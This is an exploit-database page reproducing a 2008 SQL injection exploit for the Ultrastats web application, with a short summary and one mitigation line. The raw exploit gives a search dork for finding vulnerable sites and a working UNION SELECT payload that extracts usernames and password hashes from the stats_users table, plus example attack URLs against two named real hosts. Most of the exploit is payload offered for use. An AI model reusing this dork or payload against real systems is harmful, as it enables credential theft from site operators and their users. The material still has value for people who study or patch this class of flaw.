header-logo
Suggest Exploit
vendor:
Ultrastats
by:
eeee eeee e e
8.8
CVSS
HIGH
SQL Injection
89
CWE
Product Name: Ultrastats
Affected Version From: All versions
Affected Version To: All versions
Patch Exists: YES
Related CWE: N/A
CPE: N/A
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2020

Ultrastats exploit by eeee eeee e e

This exploit affects all versions of Ultrastats, including version 0.3.11 and 0.2.144. It allows an attacker to inject malicious SQL code into the Ultrastats database, potentially allowing them to gain access to sensitive information or modify the database.

Mitigation:

Developers should ensure that all user-supplied input is properly sanitized and validated before being used in any SQL queries.
Source

Exploit-DB raw data:

			
				                     #########
				                   #############
				                 #################
				               ####################
				              ####`   `####`   `####
				             #####|||        |||#####
				            ######|||        |||######
				           #######||| ||##|| |||#######
				           #######||||||##||||||#######
 				           ############################
 				            ###########################
        				      ######+++++++++++######
            				          #++++++++++++#
   				               ___#++++++++++++#
      				             _|   #++++++++++++|___
       				            |        ++++++++      |
      				            |_          ++        _|
         				      |_________+________|
########################################################################################################
#                         Ultrastats exploit by  eeee eeee e   e                                       #
#                         -------------------->  8    8    8   8                                       # 
#                                                8eee 8eee 8eee8e                                      #
#                                                88   88   88   8                                      #
#                                                88ee 88ee 88   8 ---> mail: hexdez@nm.ru              #
########################################################################################################
#                                                -> Greetz to:                                         #
#             th0br0,magicwolf,_d4vid,ekaF,psychobarbie,d3hydr8,modda,#chaostreffpunkt                 #
########################################################################################################
#                                  -> Ultrastats all Versions?! Sql Injection                          #
#                                        (Version 0.3.11 & 0.2.144 tested)                             #
########################################################################################################
#                                      -> Dork: inurl:"index.php?serverid="                            #
########################################################################################################
#                                                  -> Injection:                                       #
# Querry -> index.php?serverid=2+union+select+0,1,concat(username,0x3a,password),3+from+stats_users--  #
#                                              and watch the Source  ;)                                #
#                                                                                                      #
#                                                 -> Example:                                          #
# -> v.  0.3.11:                                                                                       #
#                                                                                                      ##
# http://cod2demo.ultrastats.org/index.php?serverid=2+union+select+0,1,concat(username,0x3a,password),3+from+stats_users--
#
# -> v. 0.2.144: 
#
# http://www.ultrastats.x2server4u.de/index.php?serverid=6+union+select+0,1,concat(username,0x3a,password),3+from+stats_users--
##

# milw0rm.com [2008-11-17]